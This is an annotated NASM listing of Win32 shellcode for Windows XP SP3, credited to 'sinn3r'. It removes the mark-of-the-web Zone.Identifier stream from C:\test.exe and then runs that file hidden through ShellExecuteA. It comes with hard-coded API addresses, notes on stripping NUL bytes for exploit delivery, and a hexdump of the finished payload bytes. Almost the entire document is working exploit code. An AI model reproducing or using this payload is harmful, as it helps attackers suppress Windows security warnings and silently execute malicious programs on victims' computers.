
Win32 XP SP3 ShellExecuteA shellcode

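   ; Win32 (x86) shellcode: strip the Zone.Identifier ADS from C:\test.exe and run it.
;
;   Author: sinn3r (x90.sinner {a.t} gmail.c0m)
;   Tested on Windows XP SP3
;
;   What it does:
;     1. Builds "C:\test.exe" and ":Zone.Identifier:$DATA" on the stack.
;     2. strcat()s them and calls DeleteFileA("C:\test.exe:Zone.Identifier:$DATA")
;        to remove the mark-of-the-web stream that makes Windows show the
;        "Open File - Security Warning" prompt for a downloaded executable.
;     3. Truncates the buffer back to "C:\test.exe" and calls
;        ShellExecuteA(NULL, "open", "C:\test.exe", NULL, NULL, 0 /* SW_HIDE */).
;
;   Requirements / caveats to check before using this payload:
;     - KERNEL32, msvcrt and SHELL32 must already be loaded in the exploited
;       process. The three API addresses below are hard-coded for the Windows
;       XP SP3 build the author tested on (no IAT/PEB resolution); on any other
;       build, service pack or language version the calls land somewhere else
;       and the process crashes.
;     - The encoded payload contains no 0x00 bytes. The original listing had
;       NULs at offsets 0x04, 0x17 and 0x18 (from the "exe\0" and "TA\0\0"
;       immediates), which breaks delivery through any NUL-terminated copy.
;       Terminators are now pushed from a zeroed register, and the 3-byte /
;       2-byte string remainders are padded with 0x90 and skipped with LEA.
;     - strcat appends the 23-byte suffix starting at edi+11, so it writes past
;       the pushed buffer into the stack above the ESP at entry (ESP .. ESP+18).
;       That region must be disposable in the exploited frame.
;     - No return value is checked: if the ADS does not exist DeleteFileA simply
;       fails, and ShellExecuteA's result is ignored.
;     - Nothing follows the ShellExecuteA call: when it returns, execution runs
;       off the end of the payload into whatever is in memory after it. Append
;       an exit stub (ExitThread/ExitProcess, address resolved for the target)
;       if the host process must not crash.
;     - edi (lpFile) and esi (suffix) are relied on to survive the calls; both
;       are callee-saved under the Win32 cdecl/stdcall conventions.
;
;   Changes from the original listing: NUL bytes removed (see above), dead
;   "xor reg, reg" before "mov reg, ..." dropped, API addresses named with equ,
;   and the mislabelled comments ("edi = fork", "IsShown = NULL") corrected.

[BITS 32]

; Absolute API addresses from the author's XP SP3 test box (see caveats above).
STRCAT_XPSP3        equ 0x77C46040      ; msvcrt!strcat          (cdecl)
DELETEFILEA_XPSP3   equ 0x7c831ec5      ; kernel32!DeleteFileA   (stdcall, 1 arg)
SHELLEXECUTEA_XPSP3 equ 0x7ca41150      ; shell32!ShellExecuteA  (stdcall, 6 args)

global _start

_start:
        ; ---- lpFile = "C:\test.exe" -------------------------------------
        ; Register roles: edi = lpFile buffer, esi = ADS suffix,
        ; eax/edx = scratch (clobbered by every call).
        xor     edx, edx                ; edx = 0: the only NUL source in the payload
        push    edx                     ; 4-byte terminator after ".exe"
        push    0x6578652e              ; ".exe"
        push    0x74736574              ; "test"
        push    0x5c3a4390              ; 0x90 pad + "C:\" (pad keeps the immediate NUL-free)
        lea     edi, [esp + 1]          ; edi -> "C:\test.exe\0" (skip the pad byte)

        ; ---- suffix = ":Zone.Identifier:$DATA" ---------------------------
        push    edx                     ; terminator
        push    0x41544144              ; "DATA"
        push    0x243a7265              ; "er:$"
        push    0x69666974              ; "tifi"
        push    0x6e656449              ; "Iden"
        push    0x2e656e6f              ; "one."
        push    0x5a3a9090              ; 0x90 0x90 pad + ":Z"
        lea     esi, [esp + 2]          ; esi -> ":Zone.Identifier:$DATA\0"

        ; ---- strcat(edi, esi) -> "C:\test.exe:Zone.Identifier:$DATA" ------
        push    esi
        push    edi
        mov     eax, STRCAT_XPSP3
        call    eax                     ; cdecl: both arguments remain on the stack

        ; ---- DeleteFileA(edi) ---------------------------------------------
        ; strcat did not pop its arguments, so [esp] still holds edi and the
        ; stdcall DeleteFileA consumes that slot as lpFileName. The stale esi
        ; slot underneath is abandoned.
        mov     eax, DELETEFILEA_XPSP3
        call    eax                     ; failure (no ADS present) is ignored

        ; ---- truncate back to "C:\test.exe" ------------------------------
        xor     edx, edx                ; edx was clobbered by the calls
        mov     word [edi + 11], dx     ; NUL over the ':' that began the suffix

        ; ---- ShellExecuteA(NULL, "open", edi, NULL, NULL, SW_HIDE) ---------
        push    edx                     ; terminator for "open"
        push    0x6e65706f              ; "open"
        mov     edx, esp                ; edx -> "open\0"
        xor     eax, eax
        push    eax                     ; nShowCmd     = 0 (SW_HIDE)
        push    eax                     ; lpDirectory  = NULL
        push    eax                     ; lpParameters = NULL
        push    edi                     ; lpFile       = "C:\test.exe"
        push    edx                     ; lpOperation  = "open"
        push    eax                     ; hwnd         = NULL
        mov     eax, SHELLEXECUTEA_XPSP3
        call    eax                     ; no exit stub follows - see caveats above

;   Build:  nasm -f bin shellexecute.asm -o shellexecute && hexdump -C shellexecute
;   Expected bytes (102 bytes, no 0x00). The encodings were hand-checked against
;   the nasm output of the original listing; rebuild and diff before relying on it.
;   00000000  31 d2 52 68 2e 65 78 65  68 74 65 73 74 68 90 43  |1.Rh.exehtesth.C|
;   00000010  3a 5c 8d 7c 24 01 52 68  44 41 54 41 68 65 72 3a  |:\.|$.RhDATAher:|
;   00000020  24 68 74 69 66 69 68 49  64 65 6e 68 6f 6e 65 2e  |$htifihIdenhone.|
;   00000030  68 90 90 3a 5a 8d 74 24  02 56 57 b8 40 60 c4 77  |h..:Z.t$.VW.@`.w|
;   00000040  ff d0 b8 c5 1e 83 7c ff  d0 31 d2 66 89 57 0b 52  |......|..1.f.W.R|
;   00000050  68 6f 70 65 6e 89 e2 31  c0 50 50 50 57 52 50 b8  |hopen..1.PPPWRP.|
;   00000060  50 11 a4 7c ff d0                                 |P..|..|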





				